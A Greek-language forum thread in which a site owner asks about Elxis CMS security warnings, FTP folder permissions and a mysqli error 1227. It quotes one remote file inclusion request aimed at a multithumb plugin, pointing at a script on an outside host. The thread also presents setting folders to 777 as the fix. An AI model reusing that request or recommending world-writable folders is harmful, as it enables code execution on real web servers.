Συναγερμός PHP functions system, exec, passthru, shell_exec are enabledΣυναγερμός PHP allows openning remote files
Προειδοποίηση Elxis error reporting is set to ONΠροειδοποίηση Elxis FloodBlocker is disabled
//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=https://www.acaciacreek.org/assets/modules/docmanager/js/test.txt??
1, Το Αναφορά Σφαλμάτων: το εκανα κανενα ετσι πρεπει?
2, το FloodBlocker τι ειναι? εαν το ενεργοποιησω πρεπει να πειραξω και τις ρυθμισεις που εχει?
mysqli Σφάλμα [1227] : EXECUTE
Οι φάκελοι cache & tmpr απο οτι βλεπω στις ιδιοτητες απο το filezilla ειναι 755, το κανω 777 και οταν ξανα παταω ιδιοτητες αρχειου πανω στον φακελο μου λεει οτι ειναι παλι 755.
QuoteΟι φάκελοι cache & tmpr απο οτι βλεπω στις ιδιοτητες απο το filezilla ειναι 755, το κανω 777 και οταν ξανα παταω ιδιοτητες αρχειου πανω στον φακελο μου λεει οτι ειναι παλι 755.Ο χρήστης που έχεις ορίσει στο ftp έχει όλα τα δικαιώματα; Δοκίμασε να μπείς με άλλο ftp πρόγραμμα (core ftp lite είναι δωρεάν) εάν και πάλι δεν κάνεις κάτι μίλα με το hosting σου.
αλλα το mysqli Σφάλμα [1227] : EXECUTE δεν εχω βρει ακομα τι φταιει.
Εκλεισα το filezilla και το ξανα ανοιξα και τωρα μου αλλαξε κανονικα τους φακελους σε 777 αλλα το mysqli Σφάλμα [1227] : EXECUTE δεν εχω βρει ακομα τι φταιει.